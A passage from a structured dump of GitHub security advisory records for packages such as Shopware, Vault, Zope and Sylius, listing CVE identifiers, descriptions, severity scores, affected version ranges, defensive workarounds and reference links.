'https://lists.apache.org/thread.html/rafd5d7cf303772a0118865262946586921a65ebd98fc24f56c812574@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/activemq-users/202101.mbox/%3CCAH%2BvQmMUNnkiXv2-d3ucdErWOsdnLi6CgnK%2BVfixyJvTgTuYig%40mail.gmail.com%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210827-0002/'}]","{'cwe_ids': ['CWE-284', 'CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T23:06:41Z', 'nvd_published_at': '2021-01-27T19:15:00Z'}" +1.4.0,GHSA-p696-gf58-9w97,2021-06-25T15:36:05Z,2021-06-29T17:23:10Z,,['CVE-2021-32709'],Missing Authentication for Critical Function,"Shopware is an open source eCommerce platform. Creation of order credits was not validated by ACL in admin orders. Users are recommend to update to the current version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-g7w8-pp9w-7p32'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32709'}, {'type': 'WEB', 'url': 'https://www.shopware.com/en/changelog/#6-4-1-1'}]","{'cwe_ids': ['CWE-306'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T15:36:05Z', 'nvd_published_at': '2021-06-24T19:15:00Z'}" +1.4.0,GHSA-q8pj-2vqx-8ggc,2021-12-02T17:48:49Z,2021-06-07T22:11:39Z,,['CVE-2021-33587'],Denial of service in css-what,The css-what package 4.0.0 through 5.0.0 for Node.js does not ensure that attribute parsing has Linear Time Complexity relative to the size of the input.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'css-what'}, 'ecosystem_specific': {'affected_functions': ['css-what.parse', 'css-what.stringify']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '5.0.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.0.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33587'}, {'type': 'WEB', 'url': 'https://github.com/fb55/css-what/commit/4cdaacfd0d4b6fd00614be030da0dea6c2994655'}, {'type': 'PACKAGE', 'url': 'https://github.com/fb55/css-what'}, {'type': 'WEB', 'url': 'https://github.com/fb55/css-what/releases/tag/v5.0.1'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/03/msg00001.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210706-0007/'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T18:12:32Z', 'nvd_published_at': '2021-05-28T20:15:00Z'}" +1.4.0,GHSA-h45p-w933-jxh3,2021-06-01T18:59:14Z,2021-06-01T21:20:22Z,,[],Improper Verification of Cryptographic Signature in aws-encryption-sdk-javascript ,"### Impact + +This advisory addresses several LOW severity issues with streaming signed messages and restricting processing of certain types of invalid messages. + +This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext, however some callers may rely on the the ECDSA signature for non-repudiation. Without validating the ECDSA signature, an actor with trusted KMS permissions to decrypt a message may also be able to encrypt messages. This update introduces a new API for callers who wish to stream only unsigned messages. + +For customers who process ESDK messages from untrusted sources, this update also introduces a new configuration to limit the number of Encrypted Data Keys (EDKs) that the ESDK will attempt to process per message. This configuration provides customers with a way to limit the number of AWS KMS Decrypt API calls that the ESDK will make per message. This setting will reject messages with more EDKs than the configured limit. + +Finally, this update adds early rejection of invalid messages with certain invalid combinations of algorithm suite and header data. + +### Patches + +Fixed in versions 1.9 and 2.2. We recommend that all users upgrade to address these issues. + +Customers leveraging the ESDK’s streaming features have several options to protect signature validation. One is to ensure that client code reads to the end of the stream before using released plaintext. With this release, using the new API for streaming and falling back to the non-streaming decrypt API for signed messages prevents using any plaintext from signed data before the signature is validated. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x + +Users processing ESDK messages from untrusted sources should use the new maximum encrypted data keys parameter. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x + +### Workarounds + +None + +### For more information + +https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#digital-sigs + +https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x +",[],"[{'package': {'ecosystem': 'npm', 'name': '@aws-crypto/client-browser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@aws-crypto/client-browser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@aws-crypto/client-node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@aws-crypto/client-node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/aws/aws-encryption-sdk-javascript/security/advisories/GHSA-h45p-w933-jxh3'}]","{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T18:59:14Z', 'nvd_published_at': None}" +1.4.0,GHSA-r4gv-vj59-cccm,2021-05-21T18:06:39Z,2021-06-23T17:27:27Z,,['CVE-2020-26283'],Control character injection in console output in github.com/ipfs/go-ipfs ,"### Impact +Control characters are not escaped from console output. This can result in hiding input from the user which could result in the user taking an unknown, malicious action. + +### Patches + + +- Patched via https://github.com/ipfs/go-ipfs/pull/7831 in v0.8.0 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [go-ipfs](http://github.com/ipfs/go-ipfs) +* Email us at [security@ipfs.io](mailto:security@ipfs.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ipfs/go-ipfs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ipfs/go-ipfs/security/advisories/GHSA-r4gv-vj59-cccm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26283'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-ipfs/pull/7831'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-ipfs/commit/fb0a9acd2d8288bd1028c3219a420de62a09683a'}]","{'cwe_ids': ['CWE-116', 'CWE-150'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T18:06:39Z', 'nvd_published_at': None}" +1.4.0,GHSA-3r8w-mphv-2f3f,2023-08-08T19:57:21Z,2021-06-21T17:12:25Z,,['CVE-2021-23396'],Prototype Pollution in lutils,All versions of package lutils are vulnerable to Prototype Pollution via the main (merge) function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'lutils'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23396'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-LUTILS-1311023'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-18T18:35:57Z', 'nvd_published_at': '2021-06-17T17:15:00Z'}" +1.4.0,GHSA-j239-4gqg-5j54,2021-06-03T19:22:05Z,2021-06-03T19:22:22Z,,['CVE-2017-1000486'],Inadequate Encryption Strength,Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.primefaces:primefaces'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0'}, {'fixed': '6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000486'}, {'type': 'WEB', 'url': 'https://github.com/primefaces/primefaces/issues/1152'}, {'type': 'WEB', 'url': 'https://cryptosense.com/weak-encryption-flaw-in-primefaces/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/43733/'}, {'type': 'WEB', 'url': 'http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html'}]","{'cwe_ids': ['CWE-326'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T19:22:05Z', 'nvd_published_at': None}" +1.4.0,GHSA-5w25-hxp5-h8c9,2021-06-17T18:47:52Z,2021-06-21T17:12:13Z,,['CVE-2021-32685'],Improper Verification of Cryptographic Signature,"tEnvoy contains the PGP, NaCl, and PBKDF2 in node.js and the browser (hashing, random, encryption, decryption, signatures, conversions), used by TogaTech.org. In versions prior to 7.0.3, the `verifyWithMessage` method of `tEnvoyNaClSigningKey` always returns `true` for any signature that has a SHA-512 hash matching the SHA-512 hash of the message even if the signature was invalid. This issue is patched in version 7.0.3. As a workaround: In `tenvoy.js` under the `verifyWithMessage` method definition within the `tEnvoyNaClSigningKey` class, ensure that the return statement call to `this.verify` ends in `.verified`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'tenvoy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TogaTech/tEnvoy/security/advisories/GHSA-7r96-8g3x-g36m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32685'}, {'type': 'WEB', 'url': 'https://github.com/TogaTech/tEnvoy/commit/a121b34a45e289d775c62e58841522891dee686b'}, {'type': 'WEB', 'url': 'https://github.com/TogaTech/tEnvoy/releases/tag/v7.0.3'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-17T18:47:52Z', 'nvd_published_at': '2021-06-16T01:15:00Z'}" +1.4.0,GHSA-w3jx-wv97-67ph,2021-05-28T18:03:43Z,2021-06-29T21:25:27Z,,['CVE-2021-33496'],Cross-site scripting in Dutchcoders transfer.sh,Dutchcoders transfer.sh before 1.2.4 allows XSS via an inline view.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/dutchcoders/transfer.sh'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33496'}, {'type': 'WEB', 'url': 'https://github.com/dutchcoders/transfer.sh/pull/373'}, {'type': 'WEB', 'url': 'https://github.com/dutchcoders/transfer.sh/commit/9df18fdc69de2e71f30d8c1e6bfab2fda2e52eb4'}, {'type': 'WEB', 'url': 'https://github.com/dutchcoders/transfer.sh/releases/tag/v1.2.4'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/43'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T18:03:43Z', 'nvd_published_at': '2021-05-24T05:15:00Z'}" +1.4.0,GHSA-38j9-7pp9-2hjw,2021-06-17T20:00:42Z,2021-06-08T18:52:05Z,,['CVE-2021-32923'],Invalid session token expiration ,"HashiCorp Vault and Vault Enterprise allowed the renewal of nearly-expired token leases and dynamic secret leases (specifically, those within 1 second of their maximum TTL), which caused them to be incorrectly treated as non-expiring during subsequent use. Fixed in 1.5.9, 1.6.5, and 1.7.2.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.7.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.6.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '1.5.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32923'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-15-vault-renewed-nearly-expired-leases-with-incorrect-non-expiring-ttls/24603'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202207-01'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/vault/'}]","{'cwe_ids': ['CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-04T18:42:40Z', 'nvd_published_at': '2021-06-03T11:15:00Z'}" +1.4.0,GHSA-5v5h-4w2g-gxxc,2021-05-03T16:51:32Z,2021-06-08T20:12:23Z,,['CVE-2021-31777'],SQL Injection in t3/dce,"The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 't3/dce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31777'}, {'type': 'WEB', 'url': 'https://bitbucket.org/ArminVieweg/dce/commits/998a2392f69f2153797c5ace6e8914ca309e70c7'}, {'type': 'WEB', 'url': 'https://excellium-services.com/cert-xlm-advisory/'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/t3/dce'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-005'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/162429/TYPO3-6.2.1-SQL-Injection.html'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T16:51:32Z', 'nvd_published_at': '2021-04-28T07:15:00Z'}" +1.4.0,GHSA-vf6q-9f2f-mwhv,2021-06-23T18:01:24Z,2021-06-24T20:28:21Z,,['CVE-2021-32575'],Improper network isolation in Hashicorp Nomad,"HashiCorp Nomad and Nomad Enterprise up to version 1.0.4 bridge networking mode allows ARP spoofing from other bridged tasks on the same node. Fixed in 0.12.12, 1.0.5, and 1.1.0 RC1.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32575'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-14-nomad-bridge-networking-mode-allows-arp-spoofing-from-other-bridged-tasks-on-same-node/24296'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/nomad'}]","{'cwe_ids': ['CWE-1100'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-18T18:39:21Z', 'nvd_published_at': '2021-06-17T19:15:00Z'}" +1.4.0,GHSA-hj56-84jw-67h6,2023-01-24T15:08:12Z,2021-06-23T23:42:04Z,,['CVE-2021-32823'],Potential Denial-of-Service in bindata,"In the bindata RubyGem before version 2.4.10 there is a potential denial-of-service vulnerability. In affected versions it is very slow for certain classes in BinData to be created. For example `BinData::Bit100000`, `BinData::Bit100001`, `BinData::Bit100002`, `BinData::Bit`. In combination with `.constantize` there is a potential for a CPU-based DoS. In version 2.4.10, bindata improved the creation time of Bits and Integers. + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'bindata'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32823'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/issues/476'}, {'type': 'WEB', 'url': 'https://github.com/dmendel/bindata/commit/d99f050b88337559be2cb35906c1f8da49531323'}, {'type': 'WEB', 'url': 'https://about.gitlab.com/releases/2021/06/01/security-release-gitlab-13-12-2-released/#update-bindata-dependency'}, {'type': 'PACKAGE', 'url': 'https://github.com/dmendel/bindata'}, {'type': 'WEB', 'url': 'https://github.com/dmendel/bindata/blob/master/ChangeLog.rdoc#version-2410-2021-05-18-'}, {'type': 'WEB', 'url': 'https://github.com/dmendel/bindata/blob/v2.4.10/ChangeLog.rdoc#version-2410-2021-05-18-'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/bindata'}]","{'cwe_ids': ['CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-06-23T23:41:30Z', 'nvd_published_at': '2021-06-24T00:15:00Z'}" +1.4.0,GHSA-gc45-j3m5-8qfq,2021-05-28T21:56:18Z,2021-06-08T20:12:32Z,,['CVE-2021-30108'],Server-Side Request Forgery in Feehi CMS,"Feehi CMS 2.1.1 is affected by a Server-side request forgery (SSRF) vulnerability. When the user modifies the HTTP Referer header to any url, the server can make a request to it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'feehi/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30108'}, {'type': 'WEB', 'url': 'https://github.com/liufee/cms/issues/57'}, {'type': 'WEB', 'url': 'https://github.com/liufee/cms/issues/57#issuecomment-1230070460'}, {'type': 'WEB', 'url': 'https://github.com/liufee/cms/commit/d45cb9cb26d6f5ef491fa2c7d87ac7f26091bd7c'}]","{'cwe_ids': ['CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T21:56:18Z', 'nvd_published_at': '2021-05-24T20:15:00Z'}" +1.4.0,GHSA-vrf2-xghr-j52v,2021-10-05T17:26:41Z,2021-06-28T18:20:42Z,,[],Private files publicly accessible with Cloud Storage providers,"### Impact + +Private files publicly accessible with Cloud Storage providers when the hashed URL is known + +### Patches + +We recommend first changing your configuration to set the correct visibility according to the documentation. The visibility must be at the same level as `type`. + +When the Storage is saved on Amazon AWS we recommending disabling public access to the bucket containing the private files: https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html + +Otherwise, update to Shopware 6.4.1.1 or install or update the Security plugin (https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659) and run the command `./bin/console s3:set-visibility` to correct your cloud file visibilities +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-vrf2-xghr-j52v'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-24T19:20:27Z', 'nvd_published_at': None}" +1.4.0,GHSA-rpxh-vg2x-526v,2021-06-30T17:59:43Z,2021-06-29T03:12:04Z,,['CVE-2021-32720'],"List of order ids, number, items total and token value exposed for unauthorized uses via new API","### Impact + +Part of the details (order ID, order number, items total, and token value) of all placed orders were exposed to unauthorized users. If exploited properly, a few additional information like the number of items in the cart and the date of the shipping may be fetched as well. This data seems to not be crucial nor is personal data, however, could be used for sociotechnical attacks or may expose a few details about shop condition to the third parties. The data possible to aggregate are the number of processed orders or their value in the moment of time. + +### Patches + +The problem has been patched at Sylius 1.9.5 and 1.10.0 + +### Workarounds +There are a few ways to fix this without updating the code. + +The first possible solution is to hide the problematic endpoints behind the firewall from not logged in users. In order to achieve it one has to add the configuration in `config/packages/security.yaml`: +```yaml + access_control: + # ... + - { path: ""%sylius.security.new_api_shop_regex%/orders"", role: IS_AUTHENTICATED_ANONYMOUSLY, methods: [POST] } + - { path: ""%sylius.security.new_api_shop_regex%/orders"", role: ROLE_USER, methods: [GET] } +``` +This would put only the order list under the firewall and allow only authorized users to access it. Once a user is authorized, it will have access to theirs orders only. + +The second possible solution is to decorate the `\Sylius\Bundle\ApiBundle\Doctrine\QueryCollectionExtension\OrdersByLoggedInUserExtension` and throw `Symfony\Component\Security\Core\Exception\AccessDeniedException` if the class is executed for unauthorized user. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '1.9.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Sylius/Sylius/security/advisories/GHSA-rpxh-vg2x-526v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32720'}, {'type': 'WEB', 'url': 'https://github.com/Sylius/Sylius/commit/21d509851559230d03292b2a635a6951748c2758'}, {'type': 'WEB', 'url': 'https://github.com/Sylius/Sylius/releases/tag/v1.9.5'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/sylius/sylius'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-28T18:23:22Z', 'nvd_published_at': '2021-06-28T19:15:00Z'}" +1.4.0,GHSA-962m-m8jw-8wrr,2021-08-31T21:04:30Z,2021-06-15T16:10:49Z,,['CVE-2021-32633'],Path Traversal in Zope,"Zope is an open-source web application server. In Zope versions prior to 4.6 and 5.2, users can access untrusted modules indirectly through Python modules that are available for direct use. By default, only users with the Manager role can add or edit Zope Page Templates through the web, but sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk from this vulnerability. The problem has been fixed in Zope 5.2 and 4.6. As a workaround, a site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0'}, {'fixed': '5.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32633'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Zope/commit/1f8456bf1f908ea46012537d52bd7e752a532c91'}, {'type': 'WEB', 'url': 'https://cyllective.com/blog/post/plone-authenticated-rce-cve-2021-32633/'}, {'type': 'PACKAGE', 'url': 'https://github.com/zopefoundation/Zope'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/21/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T20:08:03Z', 'nvd_published_at': '2021-05-21T14:15:00Z'}" +1.4.0,GHSA-hr32-mgpm-qf2f,2021-06-03T23:33:32Z,2021-06-03T23:41:34Z,,['CVE-2020-25633'],Generation of Error Message Containing Sensitive Information in RESTEasy client,A flaw was found in RESTEasy client in all versions of RESTEasy up to 4.5.6.Final. It may allow client users to obtain the server's potentially sensitive information when the server got WebApplicationException from the RESTEasy client call. The highest threat from this vulnerability is to data confidentiality.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.7.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.5.6.Final'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-client-microprofile'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.7.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.5.6.Final'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.14.0.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.13.2.Final'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-client-microprofile'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.14.0.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.13.2.Final'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25633'}, {'type': 'WEB', 'url': 'https://github.com/resteasy/Resteasy/pull/2665/commits/13c808b5967242eec1e877edbc0014a84dcd6eb0'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25633'}, {'type': 'WEB', 'url': 'https://issues.redhat.com/browse/RESTEASY-2820'}]","{'cwe_ids': ['CWE-209'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T23:33:32Z', 'nvd_published_at': None}" +1.4.0,GHSA-8hcm-jj4x-4gmr,2023-07-06T18:00:08Z,2021-06-08T20:11:40Z,,['CVE-2021-27673'],reflected XSS in tribalsystems/zenario,"Reflected XSS in the ""admin_boxes.ajax.php"" component of Tribal Systems Zenario CMS v8.8.52729 allows remote attackers to execute arbitrary code by injecting into the ""cID"" parameter when creating a new HTML component.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'tribalsystems/zenario'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.8.53370'}]}]}]","[{'type': 'ADVISORY', 'url': 